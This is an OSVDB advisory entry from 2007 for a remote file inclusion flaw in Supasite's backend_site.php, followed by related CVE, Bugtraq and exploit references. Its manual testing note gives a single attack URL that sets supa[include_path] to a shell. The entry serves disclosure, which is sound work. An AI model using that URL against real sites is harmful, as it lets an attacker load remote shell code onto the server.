Supasite backend_site.php supa[include_path] Variable Remote File Inclusion

2007-04-21T00:00:00
ID OSVDB:38855
Type osvdb
Reporter OSVDB
Modified 2007-04-21T00:00:00

Description

Manual Testing Notes

[Path]/supasite/backend_site.php?supa[include_path]=Shell

References:

Related OSVDB ID: 38845 Related OSVDB ID: 38848 Related OSVDB ID: 38850 Related OSVDB ID: 38852 Related OSVDB ID: 38854 Related OSVDB ID: 38846 Related OSVDB ID: 38853 Related OSVDB ID: 38849 Related OSVDB ID: 38847 Related OSVDB ID: 38851 ISS X-Force ID: 33796 Generic Exploit URL: http://www.milw0rm.com/exploits/3771 FrSIRT Advisory: ADV-2007-1492 CVE-2007-2185 Bugtraq ID: 23581